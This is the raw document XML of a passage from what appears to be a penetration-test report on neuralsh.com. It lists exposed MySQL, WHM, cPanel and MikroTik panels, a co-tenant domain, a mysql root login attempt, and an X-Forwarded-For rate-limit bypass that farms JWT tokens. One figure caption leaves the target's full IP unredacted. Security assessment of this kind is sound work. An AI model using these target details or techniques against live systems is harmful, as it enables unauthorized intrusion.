            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ALL databases on server accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>File system traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Web server misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Read files from other tenant accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Email interception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Mail server access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Read all mail for all hosted domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The identification of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>onesala.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a confirmed co-tenant (N-020) means a breach of neuralsh.com's infrastructure could constitute a data breach affecting a third-party organization with no involvement in or knowledge of the neuralsh.com security posture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.7.2 Network Infrastructure Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The exposed MikroTik RouterOS panel (port 9001) has implications beyond the web application layer. If the MikroTik router is compromised — particularly if default credentials (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> / blank) are active — the attacker gains control of the routing layer for all services:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Internet</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓</w:t>
        <w:br/>
        <w:t>MikroTik Router (103.16.xx.xxx:9001) — exposed publicly</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓ [controls all traffic routing]</w:t>
        <w:br/>
        <w:t>Backend Server (103.16.xx.xxx)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ├── Apache Web Server (80/443)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ├── MySQL Database (3306)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ├── cPanel/WHM Admin (2083/2087)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  └── Mail Stack (25/465/587/993/995)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A compromised router enables traffic interception, NAT manipulation, firewall rule removal, and persistent network access through custom routing entries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.7.3 Follow-Up Verification Scan (10 June 2026)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A follow-up scan conducted four days after the initial assessment confirmed all seventeen original findings remained unpatched. Three additional findings were discovered:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-018:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ports 2078 and 2091 were not present in the June 6 scan but were now open and returning HTTP 401 Basic Auth challenges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-019:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Port 25 (SMTP) transitioned from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>filtered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, indicating a firewall rule was removed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-020:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP redirects from ports 2077 and 2082 explicitly redirected to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>www.onesala.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, naming the co-tenant definitively</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.8 Exploitation Evidence — Live Target Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This section documents direct confirmation of the four critical attack vectors identified against neuralsh.com. All evidence was collected against the live target (103.16.xx.xxx) within the authorized scope of the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.8.1 WHM Root Administration Panel — Publicly Accessible</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https://103.16.xx.xxx:2087/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a standard internet connection confirmed that the WHM (Web Host Manager) root administration panel is publicly accessible with no IP restriction. The browser SSL warning confirms the certificate mismatch finding (N-008) — clicking through reveals the full WHM login page. No firewall, no IP allowlist, and no two-factor authentication prompt was present.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2651937"/>
            <wp:docPr id="33" name="Picture 33"/>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4.17: WHM admin panel at 103.16.62.217:2087 — publicly accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.8.2 MikroTik RouterOS Administration Panel — Default Credentials Pre-filled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigation to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://103.16.xx.xxx:9001/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> confirmed that the MikroTik RouterOS v6.49.18 WebFig administration interface is publicly accessible. The login form pre-fills </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the username — the factory default. If the default blank password has not been changed, full network device control is available without any credential knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2633487"/>
            <wp:docPr id="34" name="Picture 34"/>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4.18: MikroTik WebFig — RouterOS v6.49.18, admin pre-filled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.8.3 MySQL — Public Internet Connection Accepted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A direct MySQL connection attempt from the public internet confirmed that port 3306 accepts full authentication handshakes from external IP addresses:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mysql -h 103.16.xx.xxx -P 3306 -u root 2&gt;&amp;1</w:t>
        <w:br/>
        <w:t># ERROR 1045 (28000): Access denied for user 'root'@'[REDACTED]' (using password: NO)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The error message itself is the critical evidence: it reveals the tester's public IP address (redacted for privacy), confirming that the MySQL server performed a full TCP connection and authentication handshake with an external internet host. The server is not passively listening — it actively engages with every connection attempt from anywhere on the internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="889412"/>
            <wp:docPr id="35" name="Picture 35"/>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4.19: MySQL connection from public IP — authentication prompt exposed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.8.4 Rate Limit Bypass and JWT Token Farming — Confirmed Exploited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The rate-limiting bypass via X-Forwarded-For header spoofing was confirmed exploited against the live production endpoint. Thirty consecutive requests to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/web/v1/init/token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> all returned HTTP 200 with valid signed JWT tokens. The endpoint remains live and unpatched as of 11 June 2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2583063"/>
            <wp:docPr id="36" name="Picture 36"/>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4.20: Terminal showing thirty consecutive HTTP 200 responses — rate limiting not triggered</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2313134"/>
            <wp:docPr id="37" name="Picture 37"/>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4.21: Burp Suite showing live JWT token response from /web/v1/init/token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER 5: RESULTS, ANALYSIS AND REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This chapter presents the complete set of findings from the VAPT engagement, their risk ratings, the attack chains they enable, and the specific remediation steps recommended for each.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.1 Complete Findings Register</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2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL Port 3306 Exposed to Internet</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N-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MikroTik Admin Panel Exposed (Port 9001)</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N-013</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>cPanel Admin Panel Exposed (Port 2083)</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9.8</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N-014</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WHM Root Panel Exposed (Port 2087)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>10.0</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N-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SSH Port 22 Publicly Accessible</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7.2</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N-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Shared Hosting Lateral Movement Risk</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N-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Rate Limit Bypass via X-Forwarded-For</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9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
